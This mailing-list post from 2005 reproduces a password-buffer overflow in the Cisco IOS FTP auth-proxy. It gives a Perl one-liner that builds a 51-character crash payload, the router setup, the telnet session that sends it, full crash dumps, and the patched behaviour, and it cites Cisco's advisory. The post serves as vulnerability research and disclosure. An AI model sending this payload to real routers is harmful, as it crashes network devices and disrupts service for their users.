[Darklab] IOS auth_proxy b0f details

Markus markus at brennercom.net
Thu Oct 6 12:17:10 CEST 2005 

Hi list,

the testbed is a Cisco 1841 running IOS 12.3(8)T8 which
seems to be vulnerable, the problem lies in the password
buffer, if you send a pass with 51 chars
the router will crash..

perl -e 'print "pass "; print "A" x 51; print "@ \n";'

Router(config)#ip auth-proxy name darklab ftp list
darklab_acl
Router(config)#ip access-list extended darklab_acl
Router(config-ext-nacl)#permit ip host 10.0.0.2 any
Router(config-ext-nacl)#int f0/0
Router(config-if)#ip auth-proxy darklab
Router(config-if)#^Z
Router#show ip auth-proxy configuration 
Authentication global cache time is 60 minutes
Authentication global absolute time is 0 minutes
Authentication Proxy Watch-list is disabled

Authentication Proxy Rule Configuration
 Auth-proxy name darklab
    ftp list darklab_acl auth-cache-time 60 minute

looks good lets open some debug

Router#debug ip auth-proxy ftp
AUTH-PROXY FTP debugging is on
Router#debug ip auth-proxy det
AUTH-PROXY Detailed debugging is on


% telnet 192.168.0.2 21
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
220 FTP Authentication Proxy.
user u at h
331 Password Required.
pass AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@


Router#
*Oct  6 09:43:57.011: AUTH-PROXY:proto_flag=1,
dstport_index=1
*Oct  6 09:43:57.011:  SYN SEQ 2491401850 LEN 0
*Oct  6 09:43:57.011: dst_addr 192.168.0.2 src_addr
10.0.0.2 dst_port 21 src_port 32832
*Oct  6 09:43:57.011:
AUTH-PROXY:auth_proxy_half_open_count++ 1
*Oct  6 09:43:57.011: AUTH-PROXY:proto_flag=1,
dstport_index=1
*Oct  6 09:43:57.011:  ACK 23487221 SEQ 2491401851 LEN 0
*Oct  6 09:43:57.011: dst_addr 192.168.0.2 src_addr
10.0.0.2 dst_port 21 src_port 32832
*Oct  6 09:43:57.011: clientport 32832 state 0
*Oct  6 09:43:57.015: AUTH-PROXY:incremented
proxy_proc_count=1
*Oct  6 09:43:57.015: AUTH-PROXY-FTP:Getting command from
ftp client
*Oct  6 09:43:57.015: AUTH-PROXY:proto_flag=1,
dstport_index=1
*Oct  6 09:43:57.015:  ACK 23487252 SEQ 2491401851 LEN 0
*Oct  6 09:43:57.015: dst_addr 192.168.0.2 src_addr
10.0.0.2 dst_port 21 src_port 32832
*Oct  6 09:43:57.015: clientport 32832 state 0
*Oct  6 09:44:01.103: AUTH-PROXY:proto_flag=1,
dstport_index=1
*Oct  6 09:44:01.103:  PSH ACK 23487252 SEQ 2491401851 LEN
10
*Oct  6 09:44:01.103: dst_addr 192.168.0.2 src_addr
10.0.0.2 dst_port 21 src_port 32832
*Oct  6 09:44:01.103: clientport 32832 state 0
*Oct  6 09:44:01.103: AUTH-PROXY:proto_flag=1,
dstport_index=1
*Oct  6 09:44:01.103:  ACK 23487277 SEQ 2491401861 LEN 0
*Oct  6 09:44:01.103: dst_addr 192.168.0.2 src_addr
10.0.0.2 dst_port 21 src_port 32832
*Oct  6 09:44:01.103: clientport 32832 state 0

Unexpected exception, CPU signal 10, PC = 0x61725BE0


-Traceback= 61725BE0 606844C4 
$0 : 00000000, AT : 62630000, v0 : 68000000, v1 : FB2ED57A
a0 : 00000000, a1 : 632ED4DA, a2 : FB2ED579, a3 : 68000001
t0 : 632ED580, t1 : 00000001, t2 : FFFFFFFF, t3 : 0000000A
t4 : 604A4170, t5 : 00000D8F, t6 : 00000000, t7 : 00000007
s0 : 632ED4D3, s1 : 00000038, s2 : 00000001, s3 : 632ED9B8
s4 : 62CBDC50, s5 : 632ED4D8, s6 : 632ED510, s7 : 632ED4A0
t8 : E7400384, t9 : 00000000, k0 : 63277604, k1 : 606844C4
gp : 626351A0, sp : 632ED358, s8 : 632ED468, ra : 606844C4
EPC  : 61725BE0, ErrorEPC : BFC05F1C, SREG     : 3401FF03
MDLO : 00007530, MDHI     : 00000000, BadVaddr : 68000000
Cause 0000000C (Code 0x3): TLB (store) exception
Process watchdog registers:
$0 : 00000000, AT : 62630000, v0 : 6729C880, v1 : FC050CFA
a0 : 00000000, a1 : 632ED4DA, a2 : FC050CF9, a3 : 6729C881
t0 : 632ED580, t1 : 00000001, t2 : FFFFFFFF, t3 : 0000000A
t4 : 604A4170, t5 : 00000D8F, t6 : 00000000, t7 : 00000007
s0 : 632ED4D3, s1 : 00000038, s2 : 00000001, s3 : 632ED9B8
s4 : 62CBDC50, s5 : 632ED4D8, s6 : 632ED510, s7 : 632ED4A0
t8 : E7400384, t9 : 00000000, k0 : 63277604, k1 : 61725BE4
gp : 626351A0, sp : 632ED358, s8 : 632ED468, ra : 606844C4
EPC : 61725BE4, SP : 632ED358, forkx : 63277604

Writing crashinfo to flash:crashinfo_20051006-094409

Unexpected exception, CPU signal 10, PC = 0x61725BE0


-Traceback= 61725BE0 606844C4 
$0 : 00000000, AT : 62630000, v0 : 68000000, v1 : FB2ED57A
a0 : 00000000, a1 : 632ED4DA, a2 : FB2ED579, a3 : 68000001
t0 : 632ED580, t1 : 00000001, t2 : FFFFFFFF, t3 : 0000000A
t4 : 604A4170, t5 : 00000D8F, t6 : 00000000, t7 : 00000007
s0 : 632ED4D3, s1 : 00000038, s2 : 00000001, s3 : 632ED9B8
s4 : 62CBDC50, s5 : 632ED4D8, s6 : 632ED510, s7 : 632ED4A0
t8 : E7400384, t9 : 00000000, k0 : 63277604, k1 : 606844C4
gp : 626351A0, sp : 632ED358, s8 : 632ED468, ra : 606844C4
EPC  : 61725BE0, ErrorEPC : BFC05F1C, SREG     : 3401FF03
MDLO : 00007530, MDHI     : 00000000, BadVaddr : 68000000
Cause 0000000C (Code 0x3): TLB (store) exception
Process watchdog registers:
$0 : 00000000, AT : 62630000, v0 : 6729C880, v1 : FC050CFA
a0 : 00000000, a1 : 632ED4DA, a2 : FC050CF9, a3 : 6729C881
t0 : 632ED580, t1 : 00000001, t2 : FFFFFFFF, t3 : 0000000A
t4 : 604A4170, t5 : 00000D8F, t6 : 00000000, t7 : 00000007
s0 : 632ED4D3, s1 : 00000038, s2 : 00000001, s3 : 632ED9B8
s4 : 62CBDC50, s5 : 632ED4D8, s6 : 632ED510, s7 : 632ED4A0
t8 : E7400384, t9 : 00000000, k0 : 63277604, k1 : 61725BE4
gp : 626351A0, sp : 632ED358, s8 : 632ED468, ra : 606844C4
EPC : 61725BE4, SP : 632ED358, forkx : 63277604
---etc---etc---etc

here we go :-)

Router#sh flash:
-#- --length-- -----date/time------ path
1     15205844 Oct 06 2005 08:17:38
c1841-advsecurityk9-mz.123-8.T8.bin
2       166061 Oct 06 2005 09:44:08
crashinfo_20051006-094409

A patched IOS limits user/pass to 50 chars, "debug ip
auth-proxy ftp" shows the following:

*Oct  6 07:54:42.307: AUTH-PROXY-FTP:Username received
greater than allowed[50]
*Oct  6 07:54:42.307: AUTH-PROXY-FTP:Exit daemon due to
error
*Oct  6 07:54:42.307: AUTH-PROXY:decremented
proxy_proc_count=0


Refernce:
ttp://www.cisco.com/warp/public/707/cisco-sa-20050907-auth_proxy.shtml

cheers

Markus

--
Die e-Mail-Boxes von Brennercom sind Virus-gesichert und Spam-gefiltert.
Le caselle e-Mail di Brennercom sono protette da sistemi antivirus e antispam.

http://www.brennercom.it
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: crashinfo_20051006-094409
Url: http://lists.darklab.org/pipermail/darklab/attachments/20051006/a0f37064/attachment.diff

More information about the darklab mailing list